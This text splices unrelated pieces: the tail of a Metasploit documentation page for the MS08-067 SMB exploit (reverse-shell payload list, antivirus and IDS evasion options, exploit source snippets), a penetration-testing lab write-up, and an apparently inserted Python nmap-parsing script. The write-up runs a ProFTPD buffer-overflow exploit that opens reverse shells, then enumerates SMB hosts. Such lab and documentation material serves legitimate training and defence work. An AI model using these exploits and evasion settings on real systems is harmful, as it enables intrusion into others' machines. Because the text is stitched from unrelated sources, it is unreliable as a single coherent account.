   104  payload/windows/shell/bind_tcp_uuid                                          normal  No     Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
   105  payload/windows/shell/reverse_ipv6_tcp                                       normal  No     Windows Command Shell, Reverse TCP Stager (IPv6)
   106  payload/windows/shell/reverse_nonx_tcp                                       normal  No     Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   107  payload/windows/shell/reverse_ord_tcp                                        normal  No     Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   108  payload/windows/shell/reverse_tcp                                            normal  No     Windows Command Shell, Reverse TCP Stager
   109  payload/windows/shell/reverse_tcp_allports                                   normal  No     Windows Command Shell, Reverse All-Port TCP Stager
   110  payload/windows/shell/reverse_tcp_dns                                        normal  No     Windows Command Shell, Reverse TCP Stager (DNS)
   111  payload/windows/shell/reverse_tcp_uuid                                       normal  No     Windows Command Shell, Reverse TCP Stager with UUID Support
   112  payload/windows/shell/reverse_udp                                            normal  No     Windows Command Shell, Reverse UDP Stager with UUID Support
   113  payload/windows/shell_bind_tcp                                               normal  No     Windows Command Shell, Bind TCP Inline
   114  payload/windows/shell_hidden_bind_tcp                                        normal  No     Windows Command Shell, Hidden Bind TCP Inline
   115  payload/windows/shell_reverse_tcp                                            normal  No     Windows Command Shell, Reverse TCP Inline
   116  payload/windows/speak_pwned                                                  normal  No     Windows Speech API - Say "You Got Pwned!"
   117  payload/windows/upexec/bind_hidden_ipknock_tcp                               normal  No     Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
   118  payload/windows/upexec/bind_hidden_tcp                                       normal  No     Windows Upload/Execute, Hidden Bind TCP Stager
   119  payload/windows/upexec/bind_ipv6_tcp                                         normal  No     Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
   120  payload/windows/upexec/bind_ipv6_tcp_uuid                                    normal  No     Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   121  payload/windows/upexec/bind_named_pipe                                       normal  No     Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
   122  payload/windows/upexec/bind_nonx_tcp                                         normal  No     Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   123  payload/windows/upexec/bind_tcp                                              normal  No     Windows Upload/Execute, Bind TCP Stager (Windows x86)
   124  payload/windows/upexec/bind_tcp_uuid                                         normal  No     Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
   125  payload/windows/upexec/reverse_ipv6_tcp                                      normal  No     Windows Upload/Execute, Reverse TCP Stager (IPv6)
   126  payload/windows/upexec/reverse_nonx_tcp                                      normal  No     Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   127  payload/windows/upexec/reverse_ord_tcp                                       normal  No     Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   128  payload/windows/upexec/reverse_tcp                                           normal  No     Windows Upload/Execute, Reverse TCP Stager
   129  payload/windows/upexec/reverse_tcp_allports                                  normal  No     Windows Upload/Execute, Reverse All-Port TCP Stager
   130  payload/windows/upexec/reverse_tcp_dns                                       normal  No     Windows Upload/Execute, Reverse TCP Stager (DNS)
   131  payload/windows/upexec/reverse_tcp_uuid                                      normal  No     Windows Upload/Execute, Reverse TCP Stager with UUID Support
   132  payload/windows/upexec/reverse_udp                                           normal  No     Windows Upload/Execute, Reverse UDP Stager with UUID Support
   133  payload/windows/vncinject/bind_hidden_ipknock_tcp                            normal  No     VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
   134  payload/windows/vncinject/bind_hidden_tcp                                    normal  No     VNC Server (Reflective Injection), Hidden Bind TCP Stager
   135  payload/windows/vncinject/bind_ipv6_tcp                                      normal  No     VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   136  payload/windows/vncinject/bind_ipv6_tcp_uuid                                 normal  No     VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   137  payload/windows/vncinject/bind_named_pipe                                    normal  No     VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager
   138  payload/windows/vncinject/bind_nonx_tcp                                      normal  No     VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   139  payload/windows/vncinject/bind_tcp                                           normal  No     VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
   140  payload/windows/vncinject/bind_tcp_uuid                                      normal  No     VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   141  payload/windows/vncinject/reverse_hop_http                                   normal  No     VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   142  payload/windows/vncinject/reverse_ipv6_tcp                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   143  payload/windows/vncinject/reverse_nonx_tcp                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   144  payload/windows/vncinject/reverse_ord_tcp                                    normal  No     VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   145  payload/windows/vncinject/reverse_tcp                                        normal  No     VNC Server (Reflective Injection), Reverse TCP Stager
   146  payload/windows/vncinject/reverse_tcp_allports                               normal  No     VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   147  payload/windows/vncinject/reverse_tcp_dns                                    normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   148  payload/windows/vncinject/reverse_tcp_uuid                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support

Evasion Options


Here is the full list of evasion options supported by the windows/smb/ms08_067_netapi exploit, used to evade defenses such as antivirus, EDR, firewalls and NIDS:

msf6 exploit(windows/smb/ms08_067_netapi) > show evasion

Module evasion options:

   Name                             Current Setting  Required  Description
   ----                             ---------------  --------  -----------
   DCERPC::fake_bind_multi          true             no        Use multi-context bind calls
   DCERPC::fake_bind_multi_append   0                no        Set the number of UUIDs to append the target
   DCERPC::fake_bind_multi_prepend  0                no        Set the number of UUIDs to prepend before the target
   DCERPC::max_frag_size            4096             yes       Set the DCERPC packet fragmentation size
   DCERPC::smb_pipeio               rw               no        Use a different delivery method for accessing named pipes (Accepted: rw, trans)
   SMB::obscure_trans_pipe_level    0                yes       Obscure PIPE string in TransNamedPipe (level 0-3)
   SMB::pad_data_level              0                yes       Place extra padding between headers and data (level 0-3)
   SMB::pad_file_level              0                yes       Obscure path names used in open/create (level 0-3)
   SMB::pipe_evasion                false            yes       Enable segmented read/writes for SMB Pipes
   SMB::pipe_read_max_size          1024             yes       Maximum buffer size for pipe reads
   SMB::pipe_read_min_size          1                yes       Minimum buffer size for pipe reads
   SMB::pipe_write_max_size         1024             yes       Maximum buffer size for pipe writes
   SMB::pipe_write_min_size         1                yes       Minimum buffer size for pipe writes
   TCP::max_send_size               0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay                  0                no        Delays inserted before every send.  (0 = disable)


Error Messages


This module may fail with the following error messages:

  • Connection reset during login
  • This most likely means a previous exploit attempt caused the service to crash
  • No matching target
  • Could not determine the exact service pack
  • Auto-targeting failed, use ‘show targets’ to manually select one
  • We could not detect the language pack, defaulting to English
  • No matching target
  • Connection failed: <E.CLASS>: <E>
  • Connection reset during login
  • This most likely means a previous exploit attempt caused the service to crash
  • SMB error: <E.MESSAGE>
  • System is not vulnerable (status: 0x%08x)
  • Unable to locate key: «<E>»

Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.

Connection reset during login


Here is a relevant code snippet related to the «Connection reset during login» error message:

841:	    begin
842:	      connect(versions: [1])
843:	      smb_login
844:	    rescue Rex::Proto::SMB::Exceptions::LoginError => e
845:	      if e.message =~ /Connection reset/
846:	        print_error('Connection reset during login')
847:	        print_error('This most likely means a previous exploit attempt caused the service to crash')
848:	        return
849:	      else
850:	        raise e
851:	      end

This most likely means a previous exploit attempt caused the service to crash


Here is a relevant code snippet related to the «This most likely means a previous exploit attempt caused the service to crash» error message:

842:	      connect(versions: [1])
843:	      smb_login
844:	    rescue Rex::Proto::SMB::Exceptions::LoginError => e
845:	      if e.message =~ /Connection reset/
846:	        print_error('Connection reset during login')
847:	        print_error('This most likely means a previous exploit attempt caused the service to crash')
848:	        return
849:	      else
850:	        raise e
851:	      end
852:	    end

No matching target


Here is a relevant code snippet related to the «No matching target» error message:

863:	
864:	      print_status("Fingerprint: #{fprint['os']} - #{fprint['sp']} - lang:#{fprint['lang']}")
865:	
866:	      # Bail early on unknown OS
867:	      if (fprint['os'] == 'Unknown')
868:	        fail_with(Failure::NoTarget, 'No matching target')
869:	      end
870:	
871:	      # Windows 2000 is mostly universal
872:	      if (fprint['os'] == 'Windows 2000')
873:	        mytarget = targets[1]

Could not determine the exact service pack


Here is a relevant code snippet related to the «Could not determine the exact service pack» error message:

888:	        fprint['os'] = 'Windows 2003'
889:	      end
890:	
891:	      # Service Pack match must be exact
892:	      if (not mytarget) and fprint['sp'].index('+')
893:	        print_error('Could not determine the exact service pack')
894:	        print_error("Auto-targeting failed, use 'show targets' to manually select one")
895:	        disconnect
896:	        return
897:	      end
898:	

Auto-targeting failed, use ‘show targets’ to manually select one


Here is a relevant code snippet related to the «Auto-targeting failed, use ‘show targets’ to manually select one» error message:

889:	      end
890:	
891:	      # Service Pack match must be exact
892:	      if (not mytarget) and fprint['sp'].index('+')
893:	        print_error('Could not determine the exact service pack')
894:	        print_error("Auto-targeting failed, use 'show targets' to manually select one")
895:	        disconnect
896:	        return
897:	      end
898:	
899:	      # Language Pack match must be exact or we default to English

We could not detect the language pack, defaulting to English


Here is a relevant code snippet related to the «We could not detect the language pack, defaulting to English» error message:

896:	        return
897:	      end
898:	
899:	      # Language Pack match must be exact or we default to English
900:	      if (not mytarget) and fprint['lang'] == 'Unknown'
901:	        print_status('We could not detect the language pack, defaulting to English')
902:	        fprint['lang'] = 'English'
903:	      end
904:	
905:	      # Normalize the service pack string
906:	      fprint['sp'].gsub!(/Service Pack\s+/, 'SP')

No matching target


Here is a relevant code snippet related to the «No matching target» error message:

918:	          end
919:	        end
920:	      end
921:	
922:	      unless mytarget
923:	        fail_with(Failure::NoTarget, 'No matching target')
924:	      end
925:	
926:	      print_status("Selected Target: #{mytarget.name}")
927:	    end
928:	

Connection failed: <E.CLASS>: <E>


Here is a relevant code snippet related to the «Connection failed: <E.CLASS>: <E>» error message:

1087:	  def check
1088:	    begin
1089:	      connect(versions: [1])
1090:	      smb_login
1091:	    rescue Rex::ConnectionError => e
1092:	      vprint_error("Connection failed: #{e.class}: #{e}")
1093:	      return Msf::Exploit::CheckCode::Unknown
1094:	    rescue Rex::Proto::SMB::Exceptions::LoginError => e
1095:	      if e.message =~ /Connection reset/
1096:	        vprint_error('Connection reset during login')
1097:	        vprint_error('This most likely means a previous exploit attempt caused the service to crash')

Connection reset during login


Here is a relevant code snippet related to the «Connection reset during login» error message:

1091:	    rescue Rex::ConnectionError => e
1092:	      vprint_error("Connection failed: #{e.class}: #{e}")
1093:	      return Msf::Exploit::CheckCode::Unknown
1094:	    rescue Rex::Proto::SMB::Exceptions::LoginError => e
1095:	      if e.message =~ /Connection reset/
1096:	        vprint_error('Connection reset during login')
1097:	        vprint_error('This most likely means a previous exploit attempt caused the service to crash')
1098:	        return Msf::Exploit::CheckCode::Unknown
1099:	      else
1100:	        raise e
1101:	      end

This most likely means a previous exploit attempt caused the service to crash


Here is a relevant code snippet related to the «This most likely means a previous exploit attempt caused the service to crash» error message:

1092:	      vprint_error("Connection failed: #{e.class}: #{e}")
1093:	      return Msf::Exploit::CheckCode::Unknown
1094:	    rescue Rex::Proto::SMB::Exceptions::LoginError => e
1095:	      if e.message =~ /Connection reset/
1096:	        vprint_error('Connection reset during login')
1097:	        vprint_error('This most likely means a previous exploit attempt caused the service to crash')
1098:	        return Msf::Exploit::CheckCode::Unknown
1099:	      else
1100:	        raise e
1101:	      end
1102:	    end

SMB error: <E.MESSAGE>


Here is a relevant code snippet related to the «SMB error: <E.MESSAGE>» error message:

1121:	
1122:	    begin
1123:	      # Samba doesn't have this handle and returns an ErrorCode
1124:	      dcerpc_bind(handle)
1125:	    rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
1126:	      vprint_error("SMB error: #{e.message}")
1127:	      return Msf::Exploit::CheckCode::Safe
1128:	    end
1129:	
1130:	    vprint_status('Verifying vulnerable status... (path: 0x%08x)' % path.length)
1131:	

System is not vulnerable (status: 0x%08x)


Here is a relevant code snippet related to the «System is not vulnerable (status: 0x%08x)» error message:

1146:	    disconnect
1147:	
1148:	    if (error == 0x0052005c) # R :)
1149:	      return Msf::Exploit::CheckCode::Vulnerable
1150:	    else
1151:	      vprint_error('System is not vulnerable (status: 0x%08x)' % error) if error
1152:	      return Msf::Exploit::CheckCode::Safe
1153:	    end
1154:	  end
1155:	
1156:	  def generate_rop(version)

Unable to locate key: «<E>»


Here is a relevant code snippet related to the «Unable to locate key: «<E>»» error message:

1253:	    rvas = rvasets[version]
1254:	
1255:	    rop.map! { |e|
1256:	      if e.kind_of? String
1257:	        # Meta-replace (RVA)
1258:	        fail_with(Failure::BadConfig, "Unable to locate key: \"#{e}\"") unless rvas[e]
1259:	        module_base + rvas[e]
1260:	
1261:	      elsif e == :unused
1262:	        # Randomize
1263:	        rand_text(4).unpack('V').first



  • #14213 Merged Pull Request: Add disclosure date rubocop linting rule — enforce iso8601 disclosure dates
  • #13417 Merged Pull Request: SMBv3 integration with Framework
  • #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits ‘n bobs)
  • #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
  • #6812 Merged Pull Request: Resolve #6807, remove all OSVDB references.
  • #6659 Merged Pull Request: Fix #6658, MS08-067 unable to find the right target for W2k3SP0
  • #6655 Merged Pull Request: use MetasploitModule as a class name
  • #6648 Merged Pull Request: Change metasploit class names
  • #6491 Merged Pull Request: Shrink the size of ms08_067 so that it again works with bind_tcp
  • #6283 Merged Pull Request: increase the amount of space needed for ms08_067
  • #5466 Merged Pull Request: Add butchered version of CVE-2015-1701
  • #5529 Merged Pull Request: MS08-067 NetAPI Exploit — Added Windows 2003 SP1 & SP2 French targets
  • #4768 Merged Pull Request: Reorganize SMB mixins
  • #3543 Merged Pull Request: Rubocop -a on MS08-067 module
  • #3162 Merged Pull Request: Microsoft module name changes
  • #2922 Merged Pull Request: Multi-threaded check command, plus aux scanner support
  • #2905 Merged Pull Request: Update Exploit Checks and a msftidy to go with it
  • #2525 Merged Pull Request: Change module boilerplate
  • #2287 Merged Pull Request: updated contact info on ms08-067
  • #2229 Merged Pull Request: Add fail_with() to all module types, move Failure constants to Msf::Module

References


  • CVE-2008-4250
  • OSVDB (49243)
  • MS08-067
  • http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

See Also


Check also the following modules related to this module:

  • exploit/windows/smb/cve_2020_0796_smbghost
  • exploit/windows/smb/generic_smb_dll_injection
  • exploit/windows/smb/group_policy_startup
  • exploit/windows/smb/ipass_pipe_exec
  • exploit/windows/smb/ms03_049_netapi
  • exploit/windows/smb/ms04_007_killbill
  • exploit/windows/smb/ms04_011_lsass
  • exploit/windows/smb/ms04_031_netdde
  • exploit/windows/smb/ms05_039_pnp
  • exploit/windows/smb/ms06_025_rasmans_reg
  • exploit/windows/smb/ms06_025_rras
  • exploit/windows/smb/ms06_040_netapi
  • exploit/windows/smb/ms06_066_nwapi
  • exploit/windows/smb/ms06_066_nwwks
  • exploit/windows/smb/ms06_070_wkssvc
  • exploit/windows/smb/ms07_029_msdns_zonename
  • exploit/windows/smb/ms09_050_smb2_negotiate_func_index
  • exploit/windows/smb/ms10_046_shortcut_icon_dllloader
  • exploit/windows/smb/ms10_061_spoolss
  • exploit/windows/smb/ms15_020_shortcut_icon_dllloader
  • exploit/windows/smb/ms17_010_eternalblue
  • exploit/windows/smb/ms17_010_eternalblue_win8
  • exploit/windows/smb/ms17_010_psexec
  • exploit/windows/smb/netidentity_xtierrpcpipe
  • exploit/windows/smb/psexec
  • exploit/windows/smb/smb_delivery
  • exploit/windows/smb/smb_doublepulsar_rce
  • exploit/windows/smb/smb_relay
  • exploit/windows/smb/smb_rras_erraticgopher
  • exploit/windows/smb/smb_shadow
  • exploit/windows/smb/timbuktu_plughntcommand_bof
  • exploit/windows/smb/webexec
  • exploit/netware/smb/lsass_cifs

Related Nessus plugins:

  • Windows Server 2008 Critical RCE Vulnerabilities (uncredentialed) (PCI/DSS)
  • MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Unspecified Remote Code Execution (958644) (ECLIPSEDWING)
  • MS08-067: Microsoft Windows Server Service Crafted RPC Request Handling Remote Code Execution (958644) (ECLIPSEDWING) (uncredentialed check)
  • MS08-067: Vulnerability in Server Service Could Allow Remote Code Execution (958644) (ECLIPSEDWING) (uncredentialed check / IPS)

  • hdm
  • Brett Moore <brett.moore[at]insomniasec.com>
  • frank2 <frank2[at]dc949.org>
  • jduck

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.



OK, I finally got around to continuing with the PTP labs. This lab is somewhat introductory, since all it requires is Nessus to scan for vulnerabilities and then exploit with the appropriate Metasploit module. But I decided to do it without either Nessus (or any vulnerability scanner other than Nmap's script engine) or Metasploit, primarily to prepare for OSCP. For the Windows machine it was doable, but I have yet to find a working exploit for the FTP server outside of Metasploit. When I do I'll update it here.

We are given the following network IP and scope of engagement:

Our IP: 172.16.5.50
Scope of engagement: 10.50.97.0/24

Begin by searching for live hosts:

root@Kali:~/PTP/2.5_Exploitation/Lab 4# nmap -sn -n 10.50.97.0/24

Starting Nmap 7.60 ( https://nmap.org ) at 2019-02-20 00:09 +08
Nmap scan report for 10.50.97.1
Host is up (0.49s latency).
Nmap scan report for 10.50.97.5
Host is up (0.49s latency).
Nmap scan report for 10.50.97.8
Host is up (0.49s latency).
Nmap scan report for 10.50.97.14
Host is up (0.25s latency).
Nmap scan report for 10.50.97.21
Host is up (0.34s latency).
Nmap done: 256 IP addresses (5 hosts up) scanned in 29.41 seconds

Enumerate the running services:

root@Kali:~/PTP/2.5_Exploitation/Lab 4# nmap -Pn -sV -n 10.50.97.5,8,14,21

Starting Nmap 7.60 ( https://nmap.org ) at 2019-02-20 00:11 +08
Stats: 0:06:21 elapsed; 0 hosts completed (4 up), 4 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 71.32% done; ETC: 00:20 (0:02:32 remaining)
Nmap scan report for 10.50.97.5
Host is up (0.25s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Nmap scan report for 10.50.97.8
Host is up (0.24s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
1025/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Nmap scan report for 10.50.97.14
Host is up (0.25s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
1025/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Nmap scan report for 10.50.97.21
Host is up (0.25s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.2a
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 4 IP addresses (4 hosts up) scanned in 606.24 seconds

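As an added example (not part of the original write-up or of Metasploit), here is a small parser for the `nmap -sV` report format shown above that flags hosts exposing SMB on the Windows releases the MS08-067 bulletin lists as affected (2000, XP, Server 2003), so a defender can prioritise them for patching or segmentation. The sample text is copied from the scan output above; the set of legacy OS CPE strings is an assumption about nmap's CPE naming.

```python
"""Triage an `nmap -sV` report for SMB exposure on end-of-life Windows releases.

Added example; not part of the original write-up or of Metasploit.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample input: copied from the `nmap -Pn -sV -n` report shown above.
SAMPLE_NMAP = """\
Starting Nmap 7.60 ( https://nmap.org ) at 2019-02-20 00:11 +08
Nmap scan report for 10.50.97.5
Host is up (0.25s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Nmap scan report for 10.50.97.8
Host is up (0.24s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
1025/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Nmap scan report for 10.50.97.21
Host is up (0.25s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.2a
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 4 IP addresses (4 hosts up) scanned in 606.24 seconds
"""

# Releases the MS08-067 bulletin names as affected, as nmap OS CPEs.
# Assumption: nmap emits exactly these CPE strings for those releases.
LEGACY_OS_CPES = {
    "cpe:/o:microsoft:windows_2000",
    "cpe:/o:microsoft:windows_xp",
    "cpe:/o:microsoft:windows_server_2003",
}
# Fallback when nmap printed no OS CPE but the SMB banner names the release.
LEGACY_VERSION_RE = re.compile(r"Windows (?:2000|XP|2003)\b")

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
CPE_RE = re.compile(r"cpe:/o:[\w.:-]+")
SMB_PORTS = (139, 445)


@dataclass
class Host:
    address: str
    ports: dict[int, tuple[str, str]] = field(default_factory=dict)  # port -> (service, version)
    os_cpes: set[str] = field(default_factory=set)


def parse_nmap(text: str) -> list[Host]:
    """Parse nmap's human-readable report into one Host per 'scan report' block."""
    hosts: list[Host] = []
    current: Host | None = None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            current = Host(m.group(1))
            hosts.append(current)
        elif current is None:
            continue  # preamble before the first host block
        elif m := PORT_RE.match(line):
            port, _proto, state, service, version = m.groups()
            if state == "open":
                current.ports[int(port)] = (service, version.strip())
        elif line.startswith("Service Info:"):
            current.os_cpes.update(CPE_RE.findall(line))
    return hosts


def legacy_smb_exposure(hosts: list[Host]) -> list[tuple[str, str, list[int]]]:
    """Return (address, evidence, smb_ports) for hosts serving SMB from a legacy release.

    Evidence is the matching OS CPE when nmap printed one, else the banner text.
    """
    findings = []
    for h in hosts:
        smb = sorted(p for p in SMB_PORTS if p in h.ports)
        if not smb:
            continue
        legacy = sorted(h.os_cpes & LEGACY_OS_CPES)
        evidence = legacy[0] if legacy else None
        if evidence is None:
            for p in smb:
                if m := LEGACY_VERSION_RE.search(h.ports[p][1]):
                    evidence = m.group(0)
                    break
        if evidence:
            findings.append((h.address, evidence, smb))
    return findings


if __name__ == "__main__":
    for addr, why, ports in legacy_smb_exposure(parse_nmap(SAMPLE_NMAP)):
        print(f"{addr}: SMB on {ports}, legacy OS evidence: {why}")
```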
All but one host are Windows-based. We can exploit the FTP server by finding the appropriate Metasploit module and running it, which is pretty straightforward.

msf5 > search ProFTPD 1.3.2

Matching Modules
================

   Name                                                         Disclosure Date  Rank       Check  Description
   ----                                                         ---------------  ----       -----  -----------
   exploit/freebsd/ftp/proftp_telnet_iac                        2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   exploit/linux/ftp/proftp_sreplace                            2006-11-26       great      Yes    ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   exploit/linux/ftp/proftp_telnet_iac                          2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   exploit/linux/misc/netsupport_manager_agent                  2011-01-08       average    No     NetSupport Manager Agent Remote Buffer Overflow
   exploit/multi/http/jira_hipchat_template                     2015-10-28       excellent  Yes    Atlassian HipChat for Jira Plugin Velocity Template Injection
   exploit/multi/http/wikka_spam_exec                           2011-11-30       excellent  Yes    WikkaWiki 1.3.2 Spam Logging PHP Injection
   exploit/multi/http/zenworks_configuration_management_upload  2015-04-07       excellent  Yes    Novell ZENworks Configuration Management Arbitrary File Upload
   exploit/unix/ftp/proftpd_133c_backdoor                       2010-12-02       excellent  No     ProFTPD-1.3.3c Backdoor Command Execution
   exploit/unix/ftp/proftpd_modcopy_exec                        2015-04-22       excellent  Yes    ProFTPD 1.3.5 Mod_Copy Command Execution
   exploit/windows/http/apache_chunked                          2002-06-19       good       Yes    Apache Win32 Chunked Encoding
   exploit/windows/http/apache_mod_rewrite_ldap                 2006-07-28       great      Yes    Apache Module mod_rewrite LDAP Protocol Buffer Overflow

msf5 exploit(freebsd/ftp/proftp_telnet_iac) > show options

Module options (exploit/freebsd/ftp/proftp_telnet_iac):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOSTS   10.50.97.21          yes       The target address range or CIDR identifier
   RPORT    21                   yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf5 exploit(freebsd/ftp/proftp_telnet_iac) > exploit

[*] Started reverse TCP handler on 172.16.5.50:4444 
[*] 10.50.97.21:21 - Automatically detecting the target...
[*] 10.50.97.21:21 - FTP Banner: 220 ProFTPD 1.3.2a Server (ProFTPD) [10.50.97.21]
[*] 10.50.97.21:21 - Selected Target: ProFTPD 1.3.2a Server (FreeBSD 8.0)
[*] 10.50.97.21:21 - Trying return address 0xbfbffdfc...
[*] 10.50.97.21:21 - Trying return address 0xbfbffbfc...
[*] 10.50.97.21:21 - Trying return address 0xbfbff9fc...
[*] 10.50.97.21:21 - Trying return address 0xbfbff7fc...
[*] 10.50.97.21:21 - Trying return address 0xbfbff5fc...
[*] 10.50.97.21:21 - Trying return address 0xbfbff3fc...
[*] 10.50.97.21:21 - Trying return address 0xbfbff1fc...
[*] 10.50.97.21:21 - Trying return address 0xbfbfeffc...
[*] 10.50.97.21:21 - Trying return address 0xbfbfedfc...
[*] 10.50.97.21:21 - Trying return address 0xbfbfebfc...
[*] Command shell session 1 opened (172.16.5.50:4444 -> 10.50.97.21:55929) at 2019-02-20 00:39:51 +0800
[*] Command shell session 2 opened (172.16.5.50:4444 -> 10.50.97.21:25446) at 2019-02-20 00:39:51 +0800


id
uid=0(root) gid=0(wheel) euid=65534(nobody) egid=65533(nogroup) groups=65533(nogroup)
whoami
nobody

OK, with that out of the way, let's look at the Windows boxes. At first I checked whether I could use smbmap to enumerate the shares. Note that, as before, I cover my failed attempts as well. Skip to read what works here.

root@Kali:~# smbmap -H 10.50.97.5
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.50.97.5...
[+] IP: 10.50.97.5:445	Name: 10.50.97.5                                        
	Disk                                                  	Permissions
	----                                                  	-----------
[!] Access Denied
root@Kali:~# smbmap -H 10.50.97.8
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.50.97.8...
[+] IP: 10.50.97.8:445	Name: 10.50.97.8                                        
	Disk                                                  	Permissions
	----                                                  	-----------
[!] Access Denied
root@Kali:~# smbmap -H 10.50.97.14
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.50.97.14...
[+] IP: 10.50.97.14:445	Name: 10.50.97.14                                       
	Disk                                                  	Permissions
	----                                                  	-----------
[!] Access Denied

No luck there. I tried other SMB tools against host 5:

root@Kali:~# nmblookup -A 10.50.97.5
Looking up status of 10.50.97.5
	ELS-WINXP       00 -         B  
	WORKGROUP       00 -  B  
	ELS-WINXP       20 -         B  
	WORKGROUP       1e -  B  

	MAC Address = 00-50-56-A1-38-43

root@Kali:~# smbclient //10.50.97.5/IPC$ -U""
WARNING: The "syslog" option is deprecated
Enter WORKGROUProot's password: 
session setup failed: NT_STATUS_INVALID_PARAMETER
root@Kali:~# smbclient -L 10.50.97.5
WARNING: The "syslog" option is deprecated
Enter WORKGROUProot's password: 
session setup failed: NT_STATUS_INVALID_PARAMETER

Still no luck. At this point I threw enum4linux at the 3 hosts to see what stuck:

root@Kali:~# enum4linux -a -v 10.50.97.5
[V] Dependent program "nmblookup" found in /usr/bin/nmblookup
[V] Dependent program "net" found in /usr/bin/net
[V] Dependent program "rpcclient" found in /usr/bin/rpcclient
[V] Dependent program "smbclient" found in /usr/bin/smbclient
[V] Dependent program "polenum" found in /usr/bin/polenum
[V] Dependent program "ldapsearch" found in /usr/bin/ldapsearch
